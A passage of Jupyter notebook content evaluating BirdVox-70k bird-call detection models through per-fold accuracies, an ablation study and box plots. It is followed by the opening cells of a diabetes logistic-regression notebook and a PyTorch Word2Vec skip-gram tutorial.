fps, tns, tps = [], [], [], []\n validation_units = localmodule.fold_units()[test_unit_id][2]\n \n for val_unit_str in validation_units:\n predictions_name = \"_\".join([\n dataset_name,\n model_name,\n \"test-\" + test_unit_str,\n trial_str,\n \"predict-\" + val_unit_str,\n \"clip-predictions.csv\"\n ])\n prediction_path = os.path.join(\n trial_dir, predictions_name)\n\n # Load prediction.\n with open(prediction_path, 'r') as f:\n reader = csv.reader(f)\n rows = list(reader)\n rows = [\",\".join(row) for row in rows]\n rows = rows[1:]\n rows = \"\\n\".join(rows)\n\n # Parse rows with correct header.\n df = pd.read_csv(StringIO(rows),\n names=[\n \"Dataset\",\n \"Test unit\",\n \"Prediction unit\",\n \"Timestamp\",\n \"Center Freq (Hz)\",\n \"Augmentation\",\n \"Key\",\n \"Ground truth\",\n \"Predicted probability\"])\n y_pred = np.array(df[\"Predicted probability\"])\n y_pred = (y_pred > 0.5).astype('int')\n\n # Load ground truth.\n y_true = np.array(df[\"Ground truth\"])\n \n # Compute confusion matrix.\n tn, fp, fn, tp = sklearn.metrics.confusion_matrix(\n y_true, y_pred).ravel()\n \n tns.append(tn)\n fps.append(fp)\n fns.append(fn)\n tps.append(tp)\n\n\n tn = sum(tns)\n tp = sum(tps)\n fn = sum(fns)\n fp = sum(fps)\n val_acc = 100 * (tn+tp) / (tn+tp+fn+fp)\n model_val_accs[model_name][test_unit_id] = val_acc\n\n \n # TEST SET EVALUATION\n trial_dir = os.path.join(\n test_unit_dir, trial_str)\n predictions_name = \"_\".join([\n dataset_name,\n model_name,\n \"test-\" + test_unit_str,\n trial_str,\n \"predict-\" + test_unit_str,\n \"clip-predictions.csv\"\n ])\n prediction_path = os.path.join(\n trial_dir, predictions_name)\n \n # Load prediction.\n with open(prediction_path, 'r') as f:\n reader = csv.reader(f)\n rows = list(reader)\n rows = [\",\".join(row) for row in rows]\n rows = rows[1:]\n rows = \"\\n\".join(rows)\n\n # Parse rows with correct header.\n df = pd.read_csv(StringIO(rows),\n names=[\n \"Dataset\",\n \"Test unit\",\n \"Prediction unit\",\n \"Timestamp\",\n \"Center Freq (Hz)\",\n \"Augmentation\",\n \"Key\",\n \"Ground truth\",\n \"Predicted probability\"])\n y_pred = np.array(df[\"Predicted probability\"])\n y_pred = (y_pred > 0.5).astype('int')\n\n # Load ground truth.\n y_true = np.array(df[\"Ground truth\"])\n\n # Compute confusion matrix.\n tn, fp, fn, tp = sklearn.metrics.confusion_matrix(\n y_true, y_pred).ravel()\n\n test_acc = 100 * (tn+tp) / (tn+tp+fn+fp)\n model_test_accs[model_name][test_unit_id] = test_acc", "_____no_output_____" ], [ "model_names", "_____no_output_____" ], [ "model_diagrams = {\n \"icassp-convnet\": \" melspec -> log \",\n \"icassp-convnet_aug-all-but-noise\": \" geom -> melspec -> log \",\n \"icassp-convnet_aug-all\": \"(noise + geom) -> melspec -> log \",\n \"icassp-ntt-convnet\": \" melspec -> log -> NTT \",\n \"icassp-ntt-convnet_aug-all-but-noise\": \" geom -> melspec -> log -> NTT \",\n \"icassp-ntt-convnet_aug-all\": \"(noise + geom) -> melspec -> log -> NTT \",\n \"pcen-convnet\": \" melspec -> PCEN \",\n \"pcen_convnet_aug-all-but-noise\": \" geom -> melspec -> PCEN \",\n \"pcen-convnet_aug-all\": \"(noise + geom) -> melspec -> PCEN \",\n \"icassp-add-convnet\": \" melspec -> log -> CONCAT\",\n \"icassp-add-convnet_aug-all-but-noise\": \" geom -> melspec -> log -> CONCAT\",\n \"icassp-add-convent_aug-all\": \"(noise + geom) -> melspec -> log -> CONCAT\",\n \"pcen-add-convnet\": \" melspec -> PCEN -> CONCAT\",\n \"pcen-add-convnet_aug-all-but-noise\": \" geom -> melspec -> PCEN -> CONCAT\",\n \"pcen-add-convnet_aug-all\": \"(noise + geom) -> melspec -> PCEN -> CONCAT\",\n \"pcen-ntt-convnet_aug-all-but-noise\": \" geom -> melspec -> PCEN -> NTT \",\n \"pcen-ntt-convnet_aug-all\": \"(noise + geom) -> melspec -> PCEN -> NTT \",\n \"pcen-addntt-convnet_aug-all\": \"(noise + geom) -> melspec -> PCEN -> AFFINE\"}\n\n", "_____no_output_____" ], [ "plt.figure(figsize=(9, 6))\nplt.rcdefaults()\nfig, ax = plt.subplots()\nplt.boxplot(np.stack(model_val_accs.values()).T, 0, 'rs', 0)\n#plt.ylim((-5.0, 1.0))\nplt.setp(ax.get_yticklabels(), family=\"serif\")\nax.set_yticklabels(model_names)\nplt.gca().invert_yaxis()\nax.set_xlabel('Accuracy (%)')\nax.set_title('BirdVox-70k validation set')\nplt.show()", "_____no_output_____" ], [ "plt.figure(figsize=(9, 6))\nplt.rcdefaults()\nfig, ax = plt.subplots()\nplt.boxplot(np.stack(model_test_accs.values()).T, 0, 'rs', 0)\n#plt.ylim((-5.0, 1.0))\nplt.setp(ax.get_yticklabels(), family=\"serif\")\nax.set_yticklabels(model_names)\nplt.gca().invert_yaxis()\nax.set_xlabel('Accuracy (%)')\nax.set_title('BirdVox-70k test set')\nplt.show()", "_____no_output_____" ], [ "model_test_accs", "_____no_output_____" ], [ "ablation_reference_name = \"pcen-add-convnet_aug-all-but-noise\"\nablation_names = [x for x in list(model_val_accs.keys()) if x not in\n [\"icassp-add-convnet_aug-all\",\n ablation_reference_name,\n \"icassp-ntt-convnet\",\n \"pcen-addntt-convnet_aug-all-but-noise\"]]\n\nablation_names = list(reversed(ablation_names))\nytick_dict = {\n \"icassp-convnet\": \" logmelspec \",\n \"icassp-convnet_aug-all-but-noise\": \"GDA -> logmelspec \",\n \"icassp-convnet_aug-all\": \"ADA -> logmelspec \",\n ##\n \"icassp-ntt-convnet\": \" logmelspec -> MoE\",\n \"icassp-ntt-convnet_aug-all-but-noise\": \"GDA -> logmelspec -> MoE\",\n \"icassp-ntt-convnet_aug-all\": \"ADA -> logmelspec -> MoE\",\n ##\n \"icassp-add-convnet\": \" logmelspec -> AT \",\n \"icassp-add-convnet_aug-all-but-noise\": \"GDA -> logmelspec -> AT \",\n \"icassp-add-convnet_aug-all\": \"ADA -> logmelspec -> AT \",\n ###\n ###\n \"pcen-convnet\": \" PCEN \",\n \"pcen-convnet_aug-all-but-noise\": \"GDA -> PCEN \",\n \"pcen-convnet_aug-all\": \"ADA -> PCEN \",\n ##\n \"pcen-ntt-convnet\": \" PCEN -> MoE\",\n \"pcen-ntt-convnet_aug-all-but-noise\": \"GDA -> PCEN -> MoE\",\n \"pcen-ntt-convnet_aug-all\": \"GDA -> PCEN -> MoE\",\n ##\n \"pcen-add-convnet\": \" PCEN -> AT \",\n \"pcen-add-convnet_aug-all-but-noise\": \"GDA -> PCEN -> AT \",\n \"pcen-add-convnet_aug-all\": \"ADA -> PCEN -> AT \",\n ###\n \"pcen-addntt-convnet_aug-all-but-noise\":\"GDA -> PCEN -> AT + MoE \",\n}\nreference_val_accs = model_val_accs[ablation_reference_name]\nablation_val_accs = [\n 100 * (reference_val_accs - model_val_accs[name]) / (100 - reference_val_accs)\n for name in ablation_names]\n\n\nablation_names = list(reversed([ablation_names[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))\nablation_val_accs = list(reversed([ablation_val_accs[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))\nablation_val_accs = np.array(ablation_val_accs)\n\nplt.rcdefaults()\nfig, ax = plt.subplots(figsize=(8, 6))\nplt.grid(linestyle=\"--\")\nplt.axvline(0.0, linestyle=\"--\", color=\"#009900\")\nplt.plot([0.0], [1+len(ablation_val_accs)], 'd',\n color=\"#009900\", markersize=10.0)\n\ncolors = [\n \"#CB0003\", # RED\n \"#E67300\", # ORANGE\n \"#990099\", # PURPLE\n \"#0000B2\", # BLUE\n \"#009900\", # GREEN\n# '#008888', # TURQUOISE\n# '#888800', # KAKI\n '#555555', # GREY\n]\n\n\nplt.boxplot(ablation_val_accs.T, 0, 'rs', 0,\n whis=100000, patch_artist=True, boxprops={\"facecolor\": \"w\"})\nfor i, color in enumerate(colors):\n plt.plot(np.array(ablation_val_accs[:,i]),\n range(1, 1+len(ablation_val_accs[:,i])), 'o', color=color)\nfig.canvas.draw()\n\nplt.setp(ax.get_yticklabels(), family=\"serif\")\n#ax.set_yticklabels([\n# \"adaptive threshold\\nreplaced by\\n mixture of experts\",\n# \"no data augmentation\",\n# \"addition of noise\\nto frontend but not to\\nauxiliary features\",\n# \"no context adaptation\",\n# \"PCEN\\nreplaced by\\nlog-mel frontend\",\n# \"state of the art [X]\"])\nax.set_yticks(range(1, 2+len(ablation_val_accs)))\nax.set_yticklabels([ytick_dict[x] for x in\n (ablation_names + [ablation_reference_name])], family=\"monospace\")\nplt.gca().invert_xaxis()\nplt.gca().invert_yaxis()\nax.set_xlabel('Relative difference in validation miss rate (%)', family=\"serif\")\nplt.ylim([0.5, 1.5+len(ablation_names)])\nplt.show()\n\n\nreference_test_accs = model_test_accs[ablation_reference_name]\nprint(reference_test_accs)\nbaseline_test_accs = model_test_accs[\"icassp-convnet_aug-all\"]\nprint(baseline_test_accs)\n\nplt.savefig('fig_exhaustive-per-fold-validation.eps', bbox_inches=\"tight\")\nplt.savefig('fig_exhaustive-per-fold-validation.png', bbox_inches=\"tight\", dpi=1000)", "_____no_output_____" ], [ "%matplotlib inline\nablation_reference_name = \"pcen-add-convnet_aug-all-but-noise\"\n#ablation_names = [x for x in list(model_val_accs.keys()) if x not in\n# [\"icassp-add-convnet_aug-all\",\n# ablation_reference_name,\n# \"icassp-ntt-convnet\",\n# \"pcen-addntt-convnet_aug-all-but-noise\"]]\nablation_names = [\n \"pcen-ntt-convnet_aug-all-but-noise\",\n \"pcen-add-convnet\",\n \"pcen-add-convnet_aug-all\",\n \"pcen-convnet_aug-all-but-noise\",\n \"icassp-convnet_aug-all-but-noise\",\n \"icassp-convnet_aug-all\"\n]\n\nablation_names = list(reversed(ablation_names))\nytick_dict = {\n \"icassp-convnet\": \" logmelspec \",\n \"icassp-convnet_aug-all-but-noise\": \"GDA -> logmelspec \",\n \"icassp-convnet_aug-all\": \"ADA -> logmelspec \",\n ##\n \"icassp-ntt-convnet\": \" logmelspec -> MoE\",\n \"icassp-ntt-convnet_aug-all-but-noise\": \"GDA -> logmelspec -> MoE\",\n \"icassp-ntt-convnet_aug-all\": \"ADA -> logmelspec -> MoE\",\n ##\n \"icassp-add-convnet\": \" logmelspec -> AT \",\n \"icassp-add-convnet_aug-all-but-noise\": \"GDA -> logmelspec -> AT \",\n \"icassp-add-convnet_aug-all\": \"ADA -> logmelspec -> AT \",\n ###\n ###\n \"pcen-convnet\": \" PCEN \",\n \"pcen-convnet_aug-all-but-noise\": \"GDA -> PCEN \",\n \"pcen-convnet_aug-all\": \"ADA -> PCEN \",\n ##\n \"pcen-ntt-convnet\": \" PCEN -> MoE\",\n \"pcen-ntt-convnet_aug-all-but-noise\": \"GDA -> PCEN -> MoE\",\n \"pcen-ntt-convnet_aug-all\": \"GDA -> PCEN -> MoE\",\n ##\n \"pcen-add-convnet\": \" PCEN -> AT \",\n \"pcen-add-convnet_aug-all-but-noise\": \"GDA -> PCEN -> AT \",\n \"pcen-add-convnet_aug-all\": \"ADA -> PCEN -> AT \",\n ###\n \"pcen-addntt-convnet_aug-all-but-noise\":\"GDA -> PCEN -> AT + MoE \",\n}\nreference_val_accs = model_val_accs[ablation_reference_name]\nablation_val_accs = [\n 100 * (reference_val_accs - model_val_accs[name]) / (100 - reference_val_accs)\n for name in ablation_names]\n\n\nablation_names = list(reversed([ablation_names[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))\nablation_val_accs = list(reversed([ablation_val_accs[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))\nablation_val_accs = np.array(ablation_val_accs)\n\nplt.rcdefaults()\nfig, ax = plt.subplots(figsize=(7, 4))\nplt.grid(linestyle=\"--\")\nplt.axvline(0.0, linestyle=\"--\", color=\"#009900\")\nplt.plot([0.0], [1+len(ablation_val_accs)], 'd',\n color=\"#009900\", markersize=10.0)\n\ncolors = [\n \"#CB0003\", # RED\n \"#E67300\", # ORANGE\n \"#990099\", # PURPLE\n \"#0000B2\", # BLUE\n \"#009900\", # GREEN\n# '#008888', # TURQUOISE\n# '#888800', # KAKI\n '#555555', # GREY\n]\n\n\nfor i, color in enumerate(colors):\n plt.plot(np.array(ablation_val_accs[:,i]),\n range(1, 1+len(ablation_val_accs[:,i])), 'o', color=color)\nfig.canvas.draw()\nplt.boxplot(ablation_val_accs.T, 0, 'rs', 0,\n whis=100000)\n\n\nplt.setp(ax.get_yticklabels(), family=\"serif\")\nax.set_yticklabels(reversed([\n \"BirdVoxDetect\",\n \"adaptive threshold\\nreplaced by\\n mixture of experts\",\n \"no data augmentation\",\n \"addition of noise\\nto frontend but not to\\nauxiliary features\",\n \"no context adaptation\",\n \"PCEN\\nreplaced by\\nlog-mel frontend\",\n \"previous state of the art [57]\"]))\nax.set_yticks(range(1, 2+len(ablation_val_accs)))\n#ax.set_yticklabels([ytick_dict[x] for x in\n# (ablation_names + [ablation_reference_name])], family=\"monospace\")\nplt.gca().invert_xaxis()\nplt.gca().invert_yaxis()\nax.set_xlabel('Relative difference in validation miss rate (%)', family=\"serif\")\nplt.ylim([0.5, 1.5+len(ablation_names)])\n#plt.show()\n\n\nreference_test_accs = model_test_accs[ablation_reference_name]\nprint(reference_test_accs)\nbaseline_test_accs = model_test_accs[\"icassp-convnet_aug-all\"]\nprint(baseline_test_accs)\n\nplt.savefig('fig_ablation-study.eps', bbox_inches=\"tight\")\nplt.savefig('fig_ablation-study.svg', bbox_inches=\"tight\")\nplt.savefig('fig_ablation-study.png', bbox_inches=\"tight\", dpi=1000)", "[79.46001367 97.05073996 98.99593987 98.44224924 97.19754977 96.00087732]\n[73.95762133 94.77801268 98.76549984 94.57636778 83.8820827 94.04152654]\n" ], [ "2", "_____no_output_____" ], [ "n_trials = 10\nreport = {}\n\nfor model_name in model_names:\n\n model_dir = os.path.join(models_dir, model_name)\n\n\n # Initialize dictionaries\n model_report = {\n \"validation\": {},\n \"test_cv-acc_th=0.5\": {}\n }\n\n # Initialize matrix of validation accuracies.\n val_accs = np.zeros((n_units, n_trials))\n val_tps = np.zeros((n_units, n_trials))\n val_tns = np.zeros((n_units, n_trials))\n val_fps = np.zeros((n_units, n_trials))\n val_fns = np.zeros((n_units, n_trials))\n \n test_accs = np.zeros((n_units, n_trials))\n test_tps = np.zeros((n_units, n_trials))\n test_tns = np.zeros((n_units, n_trials))\n test_fps = np.zeros((n_units, n_trials))\n test_fns = np.zeros((n_units, n_trials))\n\n\n # Loop over test units.\n for test_unit_id, test_unit_str in enumerate(units):\n\n\n # Define directory for test unit.\n test_unit_dir = os.path.join(model_dir, test_unit_str)\n\n\n # Retrieve fold such that unit_str is in the test set.\n folds = localmodule.fold_units()\n fold = [f for f in folds if test_unit_str in f[0]][0]\n test_units = fold[0]\n validation_units = fold[2]\n\n\n # Loop over trials.\n for trial_id in range(n_trials):\n\n\n # Define directory for trial.\n trial_str = \"trial-\" + str(trial_id)\n trial_dir = os.path.join(test_unit_dir, trial_str)\n\n\n # Initialize.\n break_switch = False\n val_fn = 0\n val_fp = 0\n val_tn = 0\n val_tp = 0\n\n\n # Loop over validation units.\n for val_unit_str in validation_units:\n\n predictions_name = \"_\".join([\n dataset_name,\n model_name,\n \"test-\" + test_unit_str,\n \"trial-\" + str(trial_id),\n \"predict-\" + val_unit_str,\n \"clip-predictions.csv\"\n ])\n prediction_path = os.path.join(\n trial_dir, predictions_name)\n\n # Load prediction.\n csv_file = pd.read_csv(prediction_path)\n \n # Parse prediction.\n if model_name == \"icassp-convnet_aug-all\":\n y_pred = np.array(csv_file[\"Predicted probability\"])\n y_true = np.array(csv_file[\"Ground truth\"])\n elif model_name == \"pcen-add-convnet_aug-all-but-noise\":\n with open(prediction_path, 'r') as f:\n reader = csv.reader(f)\n rows = list(reader)\n rows = [\",\".join(row) for row in rows]\n rows = rows[1:]\n rows = \"\\n\".join(rows)\n\n # Parse rows with correct header.\n df = pd.read_csv(StringIO(rows),\n names=[\n \"Dataset\",\n \"Test unit\",\n \"Prediction unit\",\n \"Timestamp\",\n \"Center Freq (Hz)\",\n \"Augmentation\",\n \"Key\",\n \"Ground truth\",\n \"Predicted probability\"])\n y_pred = np.array(df[\"Predicted probability\"])\n y_true = np.array(df[\"Ground truth\"])\n \n # Threshold.\n y_pred = (y_pred > 0.5).astype('int')\n\n # Check that CSV file is not corrupted.\n if len(y_pred) == 0:\n break_switch = True\n break\n\n # Compute confusion matrix.\n tn, fp, fn, tp = sklearn.metrics.confusion_matrix(\n y_true, y_pred).ravel()\n\n val_fn = val_fn + fn\n val_fp = val_fp + fp\n val_tn = val_tn + tn\n val_tp = val_tp + tp\n\n\n if not break_switch:\n val_acc = (val_tn+val_tp) / (val_fn+val_fp+val_tn+val_tp)\n else:\n val_fn = 0\n val_fp = 0\n val_tn = 0\n val_tp = 0\n val_acc = 0.0\n \n val_fns[test_unit_id, trial_id] = val_fn\n val_fps[test_unit_id, trial_id] = val_fp\n val_tns[test_unit_id, trial_id] = val_tn\n val_tps[test_unit_id, trial_id] = val_tp\n val_accs[test_unit_id, trial_id] = val_acc\n\n\n # Initialize.\n predictions_name = \"_\".join([\n dataset_name,\n model_name,\n \"test-\" + test_unit_str,\n \"trial-\" + str(trial_id),\n \"predict-\" + test_unit_str,\n \"clip-predictions.csv\"\n ])\n prediction_path = os.path.join(\n trial_dir, predictions_name)\n\n\n with open(prediction_path, 'r') as f:\n reader = csv.reader(f)\n rows = list(reader)\n rows = [\",\".join(row) for row in rows]\n rows = rows[1:]\n rows = \"\\n\".join(rows)\n\n # Parse rows with correct header.\n df = pd.read_csv(StringIO(rows),\n names=[\n \"Dataset\",\n \"Test unit\",\n \"Prediction unit\",\n \"Timestamp\",\n \"Center Freq (Hz)\",\n \"Augmentation\",\n \"Key\",\n \"Ground truth\",\n \"Predicted probability\"])\n y_pred = np.array(df[\"Predicted probability\"])\n y_pred = (y_pred > 0.5).astype('int')\n y_true = np.array(df[\"Ground truth\"])\n\n # Check that CSV file is not corrupted.\n if len(y_pred) == 0:\n test_tn, test_fp, test_fn, test_tp = 0, 0, 0, 0\n test_acc = 0.0\n else:\n # Load ground truth.\n y_true = np.array(df[\"Ground truth\"])\n # Compute confusion matrix.\n test_tn, test_fp, test_fn, test_tp =\\\n sklearn.metrics.confusion_matrix(\n y_true, y_pred).ravel()\n test_acc = (test_tn+test_tp) / (test_fn+test_fp+test_tn+test_tp)\n\n\n test_fns[test_unit_id, trial_id] = test_fn\n test_fps[test_unit_id, trial_id] = test_fp\n test_tns[test_unit_id, trial_id] = test_tn\n test_tps[test_unit_id, trial_id] = test_tp\n test_accs[test_unit_id, trial_id] = test_acc \n \n model_report[\"validation\"][\"FN\"] = test_fn\n model_report[\"validation\"][\"FP\"] = test_fp\n model_report[\"validation\"][\"TN\"] = test_tn\n model_report[\"validation\"][\"TP\"] = test_tp\n model_report[\"validation\"][\"accuracy\"] = val_accs\n \n best_trials = np.argsort(model_report[\"validation\"][\"accuracy\"], axis=1)\n model_report[\"validation\"][\"best_trials\"] = best_trials\n \n model_report[\"test_cv-acc_th=0.5\"][\"FN\"] = test_fns\n model_report[\"test_cv-acc_th=0.5\"][\"FP\"] = test_fps\n model_report[\"test_cv-acc_th=0.5\"][\"TN\"] = test_tns\n model_report[\"test_cv-acc_th=0.5\"][\"TP\"] = test_tps\n model_report[\"test_cv-acc_th=0.5\"][\"accuracy\"] = test_accs\n\n \n cv_accs = []\n for eval_trial_id in range(5):\n cv_fn = 0\n cv_fp = 0\n cv_tn = 0\n cv_tp = 0\n\n for test_unit_id, test_unit_str in enumerate(units):\n\n best_trials = model_report[\"validation\"][\"best_trials\"]\n unit_best_trials = best_trials[test_unit_id, -5:]\n unit_best_trials = sorted(unit_best_trials)\n trial_id = unit_best_trials[eval_trial_id]\n\n cv_fn = cv_fn + model_report[\"test_cv-acc_th=0.5\"][\"FN\"][test_unit_id, trial_id]\n cv_fp = cv_fp + model_report[\"test_cv-acc_th=0.5\"][\"FP\"][test_unit_id, trial_id]\n cv_tn = cv_tn + model_report[\"test_cv-acc_th=0.5\"][\"TN\"][test_unit_id, trial_id]\n cv_tp = cv_tp + model_report[\"test_cv-acc_th=0.5\"][\"TP\"][test_unit_id, trial_id]\n\n cv_acc = (cv_tn+cv_tp) / (cv_tn+cv_tp+cv_fn+cv_fp)\n cv_accs.append(cv_acc)\n\n \n model_report[\"test_cv-acc_th=0.5\"][\"global_acc\"] = np.array(cv_accs)\n report[model_name] = model_report\n \n print(model_name, \": acc = {:5.2f}% ± {:3.1f}\".format(\n 100*np.mean(report[model_name]['test_cv-acc_th=0.5']['global_acc']),\n 100*np.std(report[model_name]['test_cv-acc_th=0.5']['global_acc'])))\n \n \n#print(report['icassp-convnet_aug-all']['test_cv-acc_th=0.5']['global_acc'])\n#print(report['pcen-add-convnet_aug-all-but-noise']['test_cv-acc_th=0.5']['global_acc'])", "icassp-convnet : acc = 85.25% ± 5.8\nicassp-convnet_aug-all-but-noise : acc = 84.71% ± 7.5\nicassp-convnet_aug-all : acc = 94.85% ± 0.8\nicassp-ntt-convnet : acc = 83.77% ± 7.8\nicassp-ntt-convnet_aug-all-but-noise : acc = 80.94% ± 7.3\nicassp-ntt-convnet_aug-all : acc = 89.68% ± 5.8\npcen-convnet : acc = 73.29% ± 4.5\npcen-convnet_aug-all-but-noise : acc = 62.21% ± 3.9\npcen-convnet_aug-all : acc = 82.46% ± 11.0\nicassp-add-convnet : acc = 71.36% ± 11.5\nicassp-add-convnet_aug-all-but-noise : acc = 78.84% ± 10.5\nicassp-add-convnet_aug-all : acc = 75.24% ± 6.5\npcen-add-convnet : acc = 93.15% ± 2.7\npcen-add-convnet_aug-all-but-noise : acc = 95.82% ± 0.5\npcen-add-convnet_aug-all : acc = 74.17% ± 4.9\npcen-ntt-convnet_aug-all-but-noise : acc = 91.82% ± 4.5\npcen-ntt-convnet_aug-all : acc = 69.24% ± 7.2\npcen-addntt-convnet_aug-all-but-noise : acc = 74.82% ± 13.4\n" ], [ "list(report.keys())", "_____no_output_____" ], [ "icassp_accs = report['icassp-convnet_aug-all']['test_cv-acc_th=0.5']['global_acc']\nprint(\"ICASSP 2018: acc = {:5.2f}% ± {:3.1f}\".format(100*np.mean(icassp_accs), 100*np.std(icassp_accs)))\n\nspl_accs = report['pcen-add-convnet_aug-all-but-noise']['test_cv-acc_th=0.5']['global_acc']\nprint(\"SPL 2018: acc = {:5.2f}% ± {:3.1f}\".format(100*np.mean(spl_accs), 100*np.std(spl_accs)))", "ICASSP 2018: acc = 94.85% ± 0.8\nSPL 2018: acc = 95.82% ± 0.5\n" ], [ "n_trials = 5\nmodel_name = \"skm-cv\"\nmodel_dir = os.path.join(models_dir, model_name)\n\n\nskm_fns = np.zeros((n_trials, n_units))\nskm_fps = np.zeros((n_trials, n_units))\nskm_tns = np.zeros((n_trials, n_units))\nskm_tps = np.zeros((n_trials, n_units))\n\n\n# Loop over trials.\nfor trial_id in range(n_trials):\n\n \n # Loop over units.\n for test_unit_id, test_unit_str in enumerate(units):\n\n # Define path to predictions.\n unit_dir = os.path.join(model_dir, test_unit_str)\n trial_str = \"trial-\" + str(5 + trial_id)\n trial_dir = os.path.join(unit_dir, trial_str)\n predictions_name = \"_\".join([\n dataset_name,\n \"skm-proba\",\n \"test-\" + test_unit_str,\n trial_str,\n \"predict-\" + test_unit_str,\n \"clip-predictions.csv\"\n ])\n predictions_path = os.path.join(trial_dir, predictions_name)\n\n # Remove header, which has too few columns (hack).\n with open(predictions_path, 'r') as f:\n reader = csv.reader(f)\n rows = list(reader)\n rows = [\",\".join(row) for row in rows]\n rows = rows[1:]\n rows = \"\\n\".join(rows)\n\n # Parse rows with correct header.\n df = pd.read_csv(StringIO(rows),\n names=[\n \"Dataset\",\n \"Test unit\",\n \"Prediction unit\",\n \"Timestamp\",\n \"Center Freq (Hz)\",\n \"Augmentation\",\n \"Key\",\n \"Ground truth\",\n \"Predicted probability\"])\n \n # Extract y_pred and y_true.\n y_pred = np.array((df[\"Predicted probability\"] > 0.5)).astype(\"int\")\n y_true = np.array(df[\"Ground truth\"])\n\n # Compute confusion matrix.\n test_tn, test_fp, test_fn, test_tp =\\\n sklearn.metrics.confusion_matrix(\n y_true, y_pred).ravel()\n \n skm_fns[trial_id, test_unit_id] = test_fn\n skm_fps[trial_id, test_unit_id] = test_fp\n skm_tns[trial_id, test_unit_id] = test_tn\n skm_tps[trial_id, test_unit_id] = test_tp\n \n \ntotal_skm_fns = np.sum(skm_fns[:, 1:], axis=1)\ntotal_skm_fps = np.sum(skm_fps[:, 1:], axis=1)\ntotal_skm_tns = np.sum(skm_tns[:, 1:], axis=1)\ntotal_skm_tps = np.sum(skm_tps[:, 1:], axis=1)\n\ntotal_skm_accs = (total_skm_tns+total_skm_tps) / (total_skm_fns+total_skm_fps+total_skm_tns+total_skm_tps)\nprint(\"SKM: acc = {:5.2f}% ± {:3.1f}\".format(100*np.mean(total_skm_accs), 100*np.std(total_skm_accs)))", "SKM: acc = 87.77% ± 0.4\n" ], [ "xticks = np.array([2.0, 5.0, 10.0, 20.0, 50.0])\nlms_snr_accs = np.repeat([0.652], 5)\npcen_snr_accs = np.repeat([0.809], 5)\nskm_accs = total_skm_accs\n\nfig, ax = plt.subplots(figsize=(10, 3))\nplt.rcdefaults()\nplt.boxplot(np.log2(np.array([\n 100*(1-lms_snr_accs),\n 100*(1-pcen_snr_accs),\n 100*(1-skm_accs),\n 100*(1-icassp_accs),\n 100*(1-spl_accs)]).T), 0, 'rs', 0,\n whis=100000, patch_artist=True, boxprops={\"facecolor\": \"w\"});\nplt.xlim(np.log2(np.array([2.0, 50.0])))\nplt.xticks(np.log2(xticks))\nplt.gca().set_xticklabels([100 - x for x in xticks])\n\nplt.setp(ax.get_yticklabels(), family=\"serif\")\nax.set_yticklabels([\"logmelspec-SNR\", \"PCEN-SNR\", \"PCA-SKM-CNN\", \"logmelspec-CNN\", \"BirdVoxDetect\"],\n family=\"serif\")\nplt.gca().invert_yaxis()\nplt.gca().invert_xaxis()\n\nplt.xlabel(\"Test accuracy (%)\", family=\"serif\")\nplt.gca().yaxis.grid(color='k', linestyle='--', linewidth=1.0, alpha=0.25, which=\"major\")\nplt.gca().xaxis.grid(color='k', linestyle='--', linewidth=1.0, alpha=0.25, which=\"major\")\n\nplt.savefig('fig_per-fold-test.eps', bbox_inches=\"tight\")", "_____no_output_____" ], [ "\n", "_____no_output_____" ], [ "np.min(icassp_accs), np.max(icassp_accs)", "_____no_output_____" ], [ "np.min(spl_accs), np.max(spl_accs)", "_____no_output_____" ], [ "\nicassp_fold_accs = report['icassp-convnet_aug-all']['validation'][\"accuracy\"]\nspl_fold_accs = report['pcen-add-convnet_aug-all-but-noise']['validation'][\"accuracy\"]\nprint(np.mean(np.max(icassp_fold_accs, axis=1)), np.mean(np.max(spl_fold_accs, axis=1)))", "0.954919296987 0.964616622329\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1c306ca06fb47dabd14c90e822357cee4e826b
16,104
ipynb
Jupyter Notebook
Logestic regression model.ipynb
phani-1995/Datascience
715268cb3634c75b621d57ac9557c6ec49e8e235
[ "MIT" ]
null
null
null
Logestic regression model.ipynb
phani-1995/Datascience
715268cb3634c75b621d57ac9557c6ec49e8e235
[ "MIT" ]
null
null
null
Logestic regression model.ipynb
phani-1995/Datascience
715268cb3634c75b621d57ac9557c6ec49e8e235
[ "MIT" ]
null
null
null
28.912029
127
0.286575
[ [ [ "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n%matplotlib inline\nimport seaborn as sn", "_____no_output_____" ], [ "pima = pd.read_csv(\"D:\\\\projects\\\\Classifications model\\\\Linear Logistic model\\\\diabetes.csv\", header= None)\npima", "_____no_output_____" ], [ "pima.head()", "_____no_output_____" ], [ "pima.describe()", "_____no_output_____" ], [ "pima.corr()", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code" ] ]
cb1c314b26ef0c2cc5f780f802891dc6c65ea2ad
679,122
ipynb
Jupyter Notebook
word2vec-embeddings/Negative_Sampling_Exercise.ipynb
sonalagrawal7/DeepLearning-nanodegree-exercises
1d4c939d95024cd1a9b3cf23d129b2e262bce097
[ "MIT" ]
3
2021-03-12T12:59:31.000Z
2021-03-16T17:11:39.000Z
word2vec-embeddings/Negative_Sampling_Exercise.ipynb
sonalagrawal7/DeepLearning-nanodegree-exercises
1d4c939d95024cd1a9b3cf23d129b2e262bce097
[ "MIT" ]
null
null
null
word2vec-embeddings/Negative_Sampling_Exercise.ipynb
sonalagrawal7/DeepLearning-nanodegree-exercises
1d4c939d95024cd1a9b3cf23d129b2e262bce097
[ "MIT" ]
null
null
null
600.461538
629,776
0.937867
[ [ [ "# Skip-gram Word2Vec\n\nIn this notebook, I'll lead you through using PyTorch to implement the [Word2Vec algorithm](https://en.wikipedia.org/wiki/Word2vec) using the skip-gram architecture. By implementing this, you'll learn about embedding words for use in natural language processing. This will come in handy when dealing with things like machine translation.\n\n## Readings\n\nHere are the resources I used to build this notebook. I suggest reading these either beforehand or while you're working on this material.\n\n* A really good [conceptual overview](http://mccormickml.com/2016/04/19/word2vec-tutorial-the-skip-gram-model/) of Word2Vec from Chris McCormick \n* [First Word2Vec paper](https://arxiv.org/pdf/1301.3781.pdf) from Mikolov et al.\n* [Neural Information Processing Systems, paper](http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf) with improvements for Word2Vec also from Mikolov et 